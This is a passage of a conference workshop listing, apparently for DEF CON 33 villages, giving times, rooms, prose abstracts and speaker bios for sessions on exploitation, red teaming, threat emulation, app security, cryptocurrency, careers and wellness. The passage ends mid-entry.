Creator Workshops List

List of Workshops presented by Creators (Villages, Communities, etc.)




101 Labs: Firmware and Software exploitation

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-401 (Embedded Systems Village)
When:  Sunday, Aug 10, 10:00 – 11:59 PDT
Saturday, Aug 9, 10:00 – 17:59 PDT
Friday, Aug 8, 10:00 – 17:59 PDT

Creator: Embedded Systems Village

This series of self-guided labs will introduce even the most novice hacker to the world of embedded device firmware and software exploitation. First-come, first-served; don’t miss a chance to try out these labs and get started with embedded device hacking.




101 Labs: Hardware Lab

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-401 (Embedded Systems Village)
When:  Friday, Aug 8, 10:00 – 17:59 PDT
Sunday, Aug 10, 10:00 – 11:59 PDT
Saturday, Aug 9, 10:00 – 17:59 PDT

Creator: Embedded Systems Village

If you’ve never popped open an embedded device and tried to get a simple shell, this is the lab for you. This is a first-come, first-served workshop where you can walk through step-by-step instructions for finding and connecting to a debug interface on an embedded device.




A Taste of Chrome V8 Exploitation

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-604 (AppSec Village)-Classroom
When:  Friday, Aug 8, 12:20 – 15:20 PDT

Creator: AppSec Village

As vulnerabilities are discovered and security patches are applied, the structure of the Chrome V8 Engine and its internal sandbox continues to evolve and become increasingly complex. In this fast-changing environment, finding and exploiting potential vulnerabilities in V8 requires an understanding of its architecture, as well as analysis and exploitation techniques.

In this workshop, we will share the detailed exploitation steps for beginners who have no prior experience with Chrome V8 exploits. It will be an opportunity to learn how to explore bugs using GDB, the d8 debugger and develop exploitation code.

This workshop is designed for beginners, and we will provide VDI environments for hands-on practice. You can join freely with just your personal laptop; no setup is required. Take this opportunity to experience Chrome V8 exploitation firsthand!


People:
    SpeakerBio:  Hoseok Lee

Hoseok Lee is the team leader of EQSTLab at SK Shieldus and serves as Executive Manager at the Ransomware Response Center under the Korean Anti-Ransomware Alliance (KARA). He specializes in researching emerging security vulnerabilities and analyzing cybersecurity trends. Through numerous presentations on cyber threat intelligence and ransomware developments, he has demonstrated broad expertise in the field of cybersecurity. Under his leadership, EQSTLab conducts comprehensive analyses of security threats across various domains including AI LLMs, IoT, and cloud environments. Based on these findings, the team develops practical penetration testing and vulnerability analysis guides that can be directly applied in the field. These resources are freely available on the official website for security professionals worldwide.

SpeakerBio:  Hyaesun Ji

Hyaesun Ji is the Project Leader of the EQSTLab at SK Shieldus, specializing in the identification and analysis of cutting-edge security vulnerabilities and emerging cybersecurity threats. She actively leads research projects focused on driving innovation and enhancing the organization’s overall security posture, significantly contributing to stronger threat mitigation and cyber resilience.

SpeakerBio:  JaeSeok Jung

I conduct CVE vulnerability analyses, produce technical reports to deliver security intelligence based on my findings, and research the latest vulnerability trends.

SpeakerBio:  Taeeun Lee

Taeeun Lee is the Security Researcher of the EQSTLab at SK Shieldus. He is deeply involved in researching software and platform vulnerabilities, focusing on identifying security flaws and analyzing potential exploits. Before diving into the inner workings of the V8 engine, he specialized in investigating and securing CMS platforms as well as Electron-based applications, during which he uncovered and documented several vulnerabilities that were later assigned CVEs. He continually keeps abreast of evolving cyber threats and security trends, reflecting a strong commitment to protecting systems and data through ongoing research and expertise development.

SpeakerBio:  Youngseo Park

Manager and Security Researcher at EQST Lab, SK Shieldus, specializing in web security, pwnable challenges, and JavaScript engine exploitation. Develops professional technical training resources based on in-depth research into V8 internals, JIT vulnerabilities, and modern browser exploitation methods.




ACUPRESSURE FOR VITALITY

Creator Talk Map Page – LVCC West-Level 2-W205 (The Diana Initiative Community)
When:  Saturday, Aug 9, 17:00 – 17:59 PDT

Creator: The Diana Initiative

Come explore the world of Traditional Chinese Medicine while we tap into our inner body wisdom and innate ability to heal ourselves. Take a journey through chi, the principles of yin and yang, the 5 elements theory and the energetic meridian system of the body.

We will flow through a meridian percussion exercise to wake up our meridians and learn how they flow. To finish the workshop, we will learn self-acupressure techniques and how to locate and stimulate potent acupressure points for vitality.

Workshop for all fitness levels. Join us for a daily wellness workshop to end your day, take time to recenter and restore yourself after your adventures at DEF CON.

This workshop is inclusive of all bodies. EveryBODY is Welcome here.


People:
    SpeakerBio:  Megan Allen

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.




Adversary Intel Lab: Build Your First Threat Emulation Plan

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 4
When:  Friday, Aug 8, 14:00 – 14:50 PDT

Creator: Red Team Village

Attendees sit down with real-world threat intelligence and walk through the process of analyzing a threat actor, identifying relevant TTPs, and creating a red team emulation plan using ATT&CK Navigator. By the end, they’ll have a completed adversary worksheet and a mini playbook for red team usage.


People:
    SpeakerBio:  Fredrik Sandström, Head of Cyber Security at Basalt

Fredrik Sandström, M.Sc. is Head of Cyber Security at Basalt, based in Stockholm, Sweden. He has nearly a decade of experience in penetration testing, alongside a background in software development and embedded systems engineering. His early work includes software development for organizations such as the Swedish Defence Research Agency (FOI).

Since 2015, Fredrik has focused on delivering advanced security assessments—including penetration testing, red teaming, and threat emulation—for clients in diverse sectors such as banking, insurance, automotive, energy, communications, and IT services. He holds multiple industry-recognized certifications, including GXPN (GIAC Exploit Researcher and Advanced Penetration Tester), GCPN (GIAC Cloud Penetration Tester), GRTP (GIAC Red Team Professional), and HTB Certified Bug Bounty Hunter (CBBH).

Fredrik is also an active contributor to the security community. He has presented at major conferences such as SEC-T—Sweden’s leading offensive security conference—and DevCon in Bucharest, Romania, a key event for developers and IT professionals in Eastern Europe.




AI-Powered Web Applications: A New Era in Security – Live Technical Demo

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Friday, Aug 8, 15:00 – 15:50 PDT

Creator: Red Team Village

In this session, we’ll take a deep dive into the future of web security through the lens of ethical hacking and artificial intelligence. Attendees will have the opportunity to see AI in action through a live demo, where we will demonstrate how AI can identify and resolve security flaws in web applications. The session will feature real-time security testing using AI-powered tools, illustrating how these technologies give ethical hackers an edge in the fight against malicious attacks.


People:
    SpeakerBio:  Ilkin Javadov

As an ethical hacker and security expert, Ilkin Javadov has made significant contributions to the cybersecurity community. A frequent speaker at world-renowned cyber conferences such as GISEC 2023-2024, DEFCON 31 Red Team Village 2023-2024, and InCyber Forum Canada 2023-2024, Ilkin shares valuable insights into the latest cyberthreats and defense strategies. Notably, Ilkin is one of the elite 20 hackers who ethically infiltrated the German Armed Forces (Bundeswehr) earning a place in their Hall of Fame and receiving a prestigious medal from a General in recognition of exceptional contributions to national security. With extensive experience in ethical hacking and cybersecurity, Ilkin continues to advance the field by mentoring and educating the next generation of security professionals.




AML Cryptocurrency Compliance

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Saturday, Aug 9, 10:00 – 10:50 PDT

Creator: Cryptocurrency Community

Students receive exposure to the law side of cryptocurrency business, including certification, regulation, government policy, and risk assessment. Regulators around the world evaluate and implement diverse regulations governing the use and applications of Blockchain reflecting varying degrees of acceptance ranging from blanket prohibition to highly facilitating frameworks. Organisations, in turn, assess the related risks and legal challenges. This workshop considers emerging trends and security essentials vital for business and financial businesses, providing a brief overview of AML and KYC and suggestions to increase security and decrease risk exposure.


People:
    SpeakerBio:  Joseph
No BIO available
SpeakerBio:  Chelsea Button, Cryptocurrency Education Initiative

Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.




AN EXPERIENTIAL JOURNEY THROUGH THE 7 CHAKRAS

Creator Talk Map Page – LVCC West-Level 2-W205 (The Diana Initiative Community)
When:  Friday, Aug 8, 17:00 – 17:59 PDT

Creator: The Diana Initiative

Chakras are the energy centers in your body where energy flows. These energy centers are directly linked to mental, physical, emotional and spiritual attributes and well-being. Chakras are constantly in flux and can be imbalanced by becoming underactive or overactive and our being as a whole becomes imbalanced often leading to dis-ease and/or emotional blocks that disrupt our internal environment and harmony.

During this workshop, we will explore each chakra from the root up to the crown through their attributes, color, element, mantra, affirmation, crystals and essential oils.

Then, we will drop into our physical and energetic bodies in a Reiki infused guided, grounding and clearing chakra meditation for a journey of deep relaxation, Earth connection and energy restoration.

This workshop is inclusive of all bodies. EveryBODY is Welcome here.


People:
    SpeakerBio:  Megan Allen

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.




Applied Cryptocurrency Hardware

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Friday, Aug 8, 16:00 – 17:50 PDT

Creator: Cryptocurrency Community

Using an electronic circuit camera, we zoom in on cryptosecure devices and their circuits. Descriptions of existing cryptocurrency hardware lead to consideration of future integrations in the physical world and how secure elements work. We pass around a showcase of half a dozen wallets and similar hardware, as well as Nitrokeys (for defence) and ChipWhisperers (for attack.) We get set up with a set of hardware development software tools, and consider the physical production workflow that top manufacturers follow in high security areas.


People:
    SpeakerBio:  Param D Pithadia, Georgia Institute of Technology

Param is an Electrical Engineering Student from Georgia Tech with a strong passion for and interest in crypto. Although he primarily got interested in cryptography and hardware security through a class at Georgia Tech, he is also working at a software company on crypto adoption and ease of use. With a unique blend of HW and SW skills, Param is truly enthusiastic about all aspects of crypto.

SpeakerBio:  Michael “MSvB” Schloh von Bennewitz, Chairman, Monero Devices

Michael Schloh von Bennewitz (MSvB) is a computer scientist specializing in cryptosecure electronics and embedded development. He is the founder of Monero Devices and responsible for research, development, and maintenance of Opensource software repositories. A prolific speaker in four languages, Michael presents at technical meetings every year.




AppSec in the Shadows: Adversarial Tradecraft in App and API Defenses

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-604 (AppSec Village)-Classroom
When:  Sunday, Aug 10, 10:00 – 12:59 PDT

Creator: AppSec Village

Modern attackers aren’t waiting for CVEs. They’re quietly mapping your apps and APIs, uncovering unintended exposures, and slipping past defenses.

Don’t just react, anticipate. This workshop pulls back the curtain on the modern attacker’s playbook. You’ll learn how adversaries extract intelligence from exposed metadata clues hiding in plain sight. Then, we’ll dive into crafting stealthy, context-aware payloads designed to bypass detection and exploit subtle implementation flaws. Through real-world examples and guided exercises, you’ll learn to identify these patterns, recognize evasions, and build resilient detection and prevention strategies.

Takeaways:
  • Early-stage recon via API access, information disclosure through common hardening
  • State-of-the-art evasion techniques with our free, open-source tool Obfuskit
  • Normalization and encoding and adversarial techniques to subvert pathing, routing, and authentication
  • Step up your defensive game against these attacks


People:
    SpeakerBio:  Roshan Piyush, Security Research at Traceable by Harness

Roshan Piyush leads Security Research at Traceable by Harness, where he also oversees Aspen Labs — Harness’s dedicated initiative for advancing modern application and API security. He is at the forefront of developing next-generation security platforms that deliver deep protection across the software lifecycle, from code to runtime.

With over a decade of experience in cybersecurity and a recent focus on API security, Roshan researches cutting-edge detection and prevention techniques across CI/CD pipelines, software supply chains, runtime environments, and cloud-native architectures. His work powers enterprise-grade security solutions that help organizations stay ahead of evolving threats.

An active contributor to the open-source security community, Roshan has been involved with projects like OWASP crAPI and Coraza WAF. He frequently shares his insights through technical talks, tools, and collaborations, helping drive progress across the broader AppSec ecosystem.

SpeakerBio:  Soujanya Namburi

I’m Soujanya Namburi, a Developer and Security Research Engineer. I specialize in WAF (Web Application Firewalls), anomaly detection, external surface scanners, and active security testing. I have extensive experience with open source security projects like OWASP Coraza, OWASP Coreruleset, and OWASP Crapi. I’m passionate about building secure, high-performance solutions and contributing to open-source projects that help organizations strengthen their security posture.




Ask a Hiring Manager with Cory Wolff

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Sunday, Aug 10, 10:00 – 11:45 PDT

Creator: Red Team Village

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.


People:
    SpeakerBio:  Cory Wolff

With over 20 years of experience in IT, security, and development, Cory Wolff leads the offensive security practice at risk3sixty, a consulting firm based in Atlanta, GA. He holds multiple certifications, including the Offensive Security Certified Professional (OSCP) and the Certified Information Systems Security Professional (CISSP), and has a proven track record of building and breaking various technologies since his first computer in 1988.

Cory also contributes to the cybersecurity community as a core team member of Red Team Village, a platform that fosters collaboration, learning, and innovation among red teamers and security professionals.




Ask a Hiring Manager with Peter Hefley

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Sunday, Aug 10, 10:00 – 11:45 PDT

Creator: Red Team Village

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.


People:
    SpeakerBio:  Peter Hefley

Team and people builder for over 20 years, primarily in the offensive security space.




Ask a Hiring Manager with Troy Fridley

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Sunday, Aug 10, 10:00 – 11:45 PDT

Creator: Red Team Village

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.


People:
    SpeakerBio:  Troy Fridley
No BIO available



Ask a Hiring Manager with Doug Mooney

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)
When:  Sunday, Aug 10, 10:00 – 11:50 PDT

Creator: Red Team Village

“Ask a Hiring Manager” is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you’re a recent graduate, transitioning from another field, or already working in security and exploring what’s next, this is your chance to get unfiltered answers to the questions that matter most.


People:
    SpeakerBio:  Doug Mooney
No BIO available



Backdoors and Breaches (ESP-ENG)

Creator Talk Map Page – LVCC West-Level 2-W220-W221 (La Villa Community)-Workshops
When:  Friday, Aug 8, 14:00 – 15:59 PDT

Creator: La Villa

Backdoors and Breaches is an interactive, highly hands-on workshop that uses a card game designed specifically to train security teams in identifying, analyzing, and responding to cyber incidents. This workshop goes far beyond theory, allowing participants to experience realistic cyberattack situations in a controlled, collaborative and, above all, educational environment.

During the session, participants will work in teams to resolve simulated incidents. Each card represents a key element of the attack chain: from initial compromise, persistence, privilege escalation, and lateral movement, to communication with command and control (C2) servers and data exfiltration. There are also “injects” cards that add unexpected complications, and “procedures” cards that allow defensive techniques and resources to be used. This forces players to think strategically, adapt, and make quick decisions, simulating the pressure and uncertainty that accompany real-life incidents.

The workshop begins with a brief explanation of the game and its card categories, followed by the presentation of a scenario that teams must investigate and resolve. Throughout the exercise, participants will roll dice to determine the success or failure of key actions, learning to interpret probabilities, plan responses, and work with limited resources. In addition, each step of the game will be discussed and related to real incident response techniques, security controls, and detection and mitigation processes used in professional environments.

The main goal of this workshop is to strengthen analysis, collaboration, and decision-making under pressure. Attendees will learn not only to detect attack vectors, but also to use forensic tools, apply containment and eradication measures, and communicate their findings and actions effectively. The session is intended for SOC teams, security analysts, students, and cybersecurity professionals, as well as anyone interested in improving their practical incident response skills.

By the end of the workshop, participants will have developed confidence in their ability to face real incidents, understood the importance of teamwork, and experienced first-hand how small decisions can have a large impact on an organization’s security.

https://www.blackhillsinfosec.com/tools/backdoorsandbreaches/


People:
    SpeakerBio:  Nikolas Behar, Information Security Consultant | Professor of Cybersecurity | Red Team Leader

Nikolas Behar is an esteemed Red Team leader and consultant with a rich history in cybersecurity, having previously held roles at Deloitte, Accenture, and PwC. His expertise lies in red teaming and threat intelligence, where he excels in integrating complex offensive security strategies. Behar has significantly enhanced detection capabilities and operational efficiency in his roles, and his innovative approach to reporting has improved stakeholder comprehension. His practical experience with MITRE TIDs and utilizing open-source intelligence from entities like US-CERT and FR-CERT underscores his deep connection to the current cybersecurity landscape.

Holding an MSc in Information Security from the University of London, Behar is also a seasoned educator in cybersecurity, teaching at multiple universities. His ability to distill complex concepts and engage diverse audiences has been showcased across various platforms, including prestigious conferences like Fal.con, BSides, and the InfoSecurity Magazine Summit. Dedicated to advancing the field, Behar leads research into emerging threats, develops cutting-edge tools, and mentors future cybersecurity professionals, reflecting his commitment to the community and continuous learning.




Be The Threat!

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-702 (Adversary Village)-Workshop Area
When:  Friday, Aug 8, 13:00 – 14:59 PDT

Creator: Adversary Village

This session will walk the participants through the tenets of threat emulation, culminating in them emulating a threat actor of their choice.

This workshop will give participants a chance to get hands on with threat emulation by covering:

  • How To Define The Threat: What is likely and what are we afraid of?
  • Gather Intel: Is there any historic reporting of said threat? Students will research a threat actor and gather actionable Behaviors.
  • Capability Development: We will use that intel gathered to engineer a threat emulation scenario to fit our needs using modern frameworks, scripts, payloads, and even customizing our delivery infrastructure.
  • Put It To Work: You will get a chance to test your threat against a live environment.

Links:
    adversaryvillage.org/adversary-events/DEFCON-33/Trey-Bilbrey/ – https://adversaryvillage.org/adversary-events/DEFCON-33/Trey-Bilbrey/

People:
    SpeakerBio:  Trey Bilbrey, Head at SCYTHE Labs

Trey Bilbrey is the Lead of SCYTHE Labs, specializing in Purple Team Exercises, Threat Emulation, Critical Infrastructure, and holistic cyber operations. Trey’s 15+ years of industry experience has allowed him to become an excellent educator, defender of networks, and a cultivator of cybersecurity professionals. Prior to joining SCYTHE, Trey held positions at notable organizations such as Hack The Box (HTB Academy content Developer), The Army Corps of Engineers (ICS/SCADA Penetration Testing), and a veteran of the United States Marine Corps (Defensive and Offensive Cyber Operations). Current certifications include the CISSP, GICSP, GCIP, and K>FiveFour RTAC.




Becoming a Caido Power User

Creator Talk Map Page – LVCC West-Level 3-W326 (Bug Bounty Village)
When:  Friday, Aug 8, 10:00 – 10:59 PDT

Creator: Bug Bounty Village

No one can deny that the job of a bug bounty hunter is tedious at times. The goal of this talk is simple: to make you a more efficient hacker using Caido. There is a lot to cover, but you can expect content surrounding the following: AI integration, collaboration, automation (JIT and otherwise), efficient navigation, and a slew of new Caido features. Caido is a rapidly evolving tool – consider this your crash course on getting back up to speed.


People:
    SpeakerBio:  Justin “rhynorater” Gardner, Advisor at Caido

I’m a full-time Bug Bounty Hunter and Host of the Critical Thinking – Bug Bounty Podcast. I also work as an Advisor for Caido (HTTP Proxy). When I’m not putting in reports or disseminating technical info on the pod, I’m normally spending time with my wife and 2 daughters, lifting heavy things, playing volleyball, or getting folded in BJJ.




Beyond the Hype: Leveraging MITRE ATT&CK for a Hands-On, Practical Assessment with Caldera

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)
When:  Friday, Aug 8, 12:00 – 13:50 PDT

Creator: Red Team Village

This hands-on workshop takes a few hours and requires a laptop with a Type II hypervisor. It dives into the practical application of the MITRE ATT&CK framework, emphasizing its value beyond simple enumeration of adversary tactics. By using ATT&CK to conduct practical exercises, organizations can better understand their threat landscape and take proactive measures to mitigate vulnerabilities. The hands-on workshop and discussion involve analyzing attacks by industry, drawing connections to real-world scenarios, and incorporating simulations to enhance risk management strategies. How do you prepare for an attack? When do you take real data to formulate an attack scenario? How do you test that plan?

A significant focus is placed on utilizing the MITRE Caldera tool for simulating and analyzing attack scenarios in specific environments. The tool provides insights into adversary tactics, allowing organizations to evaluate their defenses, detection capabilities, and mitigation strategies effectively.


People:
    SpeakerBio:  Frank Victory
No BIO available



BIC Village “B.I.C. Pick” DEF CON 33 Badge Walkthrough

Creator Talk Map Page – LVCC West-Level 3-W322-W324 (Blacks In Cyber Village)
When:  Friday, Aug 8, 10:00 – 10:59 PDT

Creator: Blacks In Cyber Village

Join us for a guided walkthrough of the Blacks in Cybersecurity Village (BIC) badge from DEF CON 33, led by the badge’s developer. This session explores the PCB design, embedded circuits that power the badge, and how this year’s design supports Shitty Add-Ons (SAOs). New to DEF CON? You’ll also get an introduction to the history of BIC badges and how they fit into the broader culture of DEF CON badge collecting. All experience levels are welcome to join and explore.


People:
    SpeakerBio:  Eli McRae

Eli McRae is a loser who doesn’t know nothing about how to computer… That doesn’t stop him though. He does hacking and hacking-related activities for the Arkansas Air National Guard and private sector. He is a founding member of the statewide Arkansas Hackers crew and has worked as an educator and technical trainer. He currently works as a pentester for a global MSSP.




Binary exploitation basics

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-303 (Malware Village)
When:  Friday, Aug 8, 14:00 – 17:59 PDT

Creator: Malware Village

This started off as a basic project I taught in Ukraine last year with Hackers arise. It has evolved onto an updated 32-bit system with MXLinux from Ubuntu. Although a big pain in the ass, we also finally updated to Python 3 in this version as well.

  • Lessons 1-2: Stack basics. Finding elements of the stack, including EBP, ESP, RETURN, ARG1 and ARG2, which we need to understand for stack overflow exploitation. We also cover how elements are copied onto the stack and how to find them.
  • Lesson 3: Building on the previous two classes, we play a game to overwrite a variable on the stack. This prepares us for stack-based overflows.
  • Lesson 4: Vanilla buffer overflow!
  • Lesson 5: Vanilla buffer overflow with a small buffer, to demonstrate that there are other places to store payloads.
  • Lesson 6: Bypassing Data Execution Prevention (DEP/NX) using return-oriented programming
  • Lesson 7: Explanation and demo of bypassing stack cookies
  • Lesson 8: Bypassing DEP and ASLR together
  • Lesson 9: Return-oriented programming

People:
    SpeakerBio:  Leigh Trinity
No BIO available



Biohacking Device Lab

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-606 (Biohacking Village)-Device Lab
When:  Friday, Aug 8, 10:00 – 17:59 PDT
Saturday, Aug 9, 10:00 – 17:59 PDT
Sunday, Aug 10, 10:00 – 13:59 PDT

Creator: Biohacking Village

The Device Lab is a highly collaborative environment where security researchers test medical instruments, applications, and devices in real time from participating Medical Device Manufacturers. Any potential issues are reported directly to the manufacturer, and coordinated vulnerability disclosures are produced.

As part of their product security programs, their proactive initiatives to test their products, and to enhance the cybersecurity of their medical technologies, select medical device makers are teaming up with the Biohacking Village.

These manufacturers are inviting security researchers to learn and to test their products in dedicated spaces set aside for them. Their staff will answer questions, educate researchers, and triage any potential security issues. Researchers who perform testing should expect to follow the manufacturers’ published coordinated vulnerability disclosure policy and report any potential issues found so they can be addressed. Security researchers must sign the Hippocratic Oath for Hackers and agree to the framework of boundaries and rules of engagement during and post conference engagement.

Links:
    More Info – https://www.villageb.io/device-lab
    Hippocratic Oath for Hackers – https://www.villageb.io/oath
    2025 Device List – https://www.villageb.io/2025devicelist



Breaking the Backbone: SS7 and GTPdoor Malware Exploits

Creator Talk Map Page – LVCC West-Level 2-W224 (Telecom Village)
When:  Saturday, Aug 9, 13:10 – 13:59 PDT

Creator: Telecom Village

This workshop demonstrates how SS7 signaling can be intercepted and manipulated to retrieve a mobile user’s location without user interaction using custom-developed malware. Additionally, it demonstrates how the GTPdoor malware creates a hidden backdoor by abusing GTP signaling in roaming networks.


People:
    SpeakerBio:  Nadeem Bagwan
No BIO available



Breaking the Rules: WAF Bypass

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C206 (OWASP Community)
When:  Saturday, Aug 9, 15:00 – 16:59 PDT

Creator: OWASP Community

In this hands-on 2-hour workshop, we will explore the fascinating and evolving world of Web Application Firewall (WAF) bypassing—a critical topic for penetration testers, red teamers, and security engineers.

Participants will be introduced to the fundamentals of WAFs, including how modern systems detect and block potentially malicious requests. We’ll then dive into a range of realistic evasion techniques used to sneak past WAF protections and interact with protected applications.

Links:
    Register Here – https://lu.ma/1h139t45

People:
    SpeakerBio:  Felipe Zipitria, OWASP CRS, ModSecurity & Coraza projects at OWASP
No BIO available



Bridge to Nowhere Good: When Azure Relay becomes a Red Teamer’s highway

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 1
When:  Friday, Aug 8, 12:00 – 13:50 PDT

Creator: Red Team Village

We have exposed critical offensive capabilities in the azbridge tool, which has been available in Microsoft Azure’s GitHub repository since 2018. This tool is a legitimate utility connecting network-isolated assets. Our research demonstrates how an attacker can weaponize this tool using its default configuration.

azbridge supports attackers in establishing covert C2 channels, exfiltrating data, and enabling lateral movement while evading scrutiny by perimeter defenses. It leverages back-end services that serve Azure Relay endpoints (*.servicebus.windows.net) and encapsulates malicious traffic in TLS-encrypted connections to *.cloudapp.azure.com endpoints, defeating egress filtering and proxy inspection.

We demonstrate how attackers can use it to maintain persistent network access, bypass network security controls, and conduct post-exploitation using Microsoft’s tool. More sophisticated adversaries can re-implement the functionality of this tool in their tradecraft (e.g., implants). For our defensive side friends, we provide initial recommendations on recognizing these techniques to defend against adversaries exploiting legitimate infrastructure.

While not a 0-day, as of 03/14/2025, there are no reports of adversaries using azbridge, and no researchers have reported this tool’s potential for abuse. Therefore, we believe it is a novel use case or at least one that has not been publicly discussed.


People:
    SpeakerBio:  Edward Landers

Edward is a red teamer and former offensive security consultant focused on adversary simulation, malware development, and social engineering. He works on bypassing security controls, evading detection, and testing the limits of modern defenses. When he’s not on an engagement, he’s refining techniques, building tools, and keeping up with the ever-changing security landscape.

SpeakerBio:  Josh Huff

Josh is an offensive security professional with more than 10 years in Information Security. He has an Associate’s Degree in Computer Forensics and Security, as well as several certifications. He began his professional career in IT as a contractor for the US Army Corps of Engineers before moving to his current company where he has held roles both on the defensive and offensive sides of security.

When not in the office Josh satisfies his curiosity exploring Red Team Infrastructure and Open Source Intelligence. He is a husband, father of two, and enjoys playing multiple instruments. Want an OSINT challenge – see if you can find his account for live streaming music.

Currently Josh is Senior Red Team Operator at a Fortune 50 insurance company.

SpeakerBio:  Robert Pimentel

Robert is a seasoned offensive security professional with more than a decade of experience in Information Security. He started his career in the U.S. Marine Corps, working on secure telecommunications. Robert holds a master’s degree in Cybersecurity, numerous IT certifications, and a background as an instructor at higher education institutions like the New Jersey Institute of Technology and American University.

Robert is committed to sharing his knowledge and experiences for the benefit of others. He enjoys Brazilian steakhouses and cuddling with his pugs while writing Infrastructure as Code to automate Red Team Infrastructure.

Robert currently serves as a Red Team Lead at Humana, Inc.




BT hacking

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-505 (Payment Village)
When:  Friday, Aug 8, 11:00 – 11:59 PDT

Creator: Payment Village

People:
    SpeakerBio:  Dan Bongiorno
No BIO available



Building Better Security Champions: A Hands-On Program Design Workshop

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C206 (OWASP Community)
When:  Saturday, Aug 9, 10:00 – 11:59 PDT

Creator: OWASP Community

Want to build a Security Champion program that doesn’t fizzle after launch? This 2-hour hands-on workshop will guide you through designing a practical, sustainable champion program tailored to your culture, org structure, and resourcing realities. Whether you’re just getting started or trying to fix a stalled initiative, this session will equip you with the tools to define your vision, shape meaningful goals, and map out your first cohort – all with a firm grounding in culture-building, metrics, and action-oriented design. Participants will work through a collaborative workbook with activities focused on champion behaviors, stakeholder alignment, motivational techniques, and training plans. You’ll leave with a solid program blueprint, practical takeaways, and inspiration to rally allies across Engineering, Application Security, and Leadership. If you believe developers are on the front lines of security, and want to do more than “raise awareness,” this is your workshop.

Links:
    Register Here – https://lu.ma/wllcvru0

People:
    SpeakerBio:  Tanya “SheHacksPurple” Janca, Security Advocate at Semgrep

Tanya Janca, aka SheHacksPurple, is the best-selling author of ‘Alice and Bob Learn Secure Coding’, ‘Alice and Bob Learn Application Security’ and the ‘AppSec Antics’ card game. Over her 28-year IT career she has won countless awards (including OWASP Lifetime Distinguished Member and Hacker of the Year), spoken all over the planet, and is a prolific blogger. Tanya has trained thousands of software developers and IT security professionals, via her online academies (We Hack Purple and Semgrep Academy), and her live training programs. Having performed counter-terrorism, led security for the 52nd Canadian general election, developed or secured countless applications, Tanya Janca is widely considered an international authority on the security of software. Tanya currently works at Semgrep as a Security Advocate.

SpeakerBio:  Stanley Harris, CEO at Katilyst

Stanley is a start-up founder and organizational culture expert focused on bridging the gap between security and software engineering. At Katilyst, he designs scalable enablement programs that empower developers to lead with security in mind, from threat modeling to vulnerability management. Stanley specializes in building Security Champion programs that don’t just raise awareness, but drive ownership, behavior change, and long-term impact. He’s passionate about demystifying security, making it actionable, and equipping teams to move fast and build securely.




Building Your First Windows Malware Loader

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Saturday, Aug 9, 13:00 – 14:50 PDT

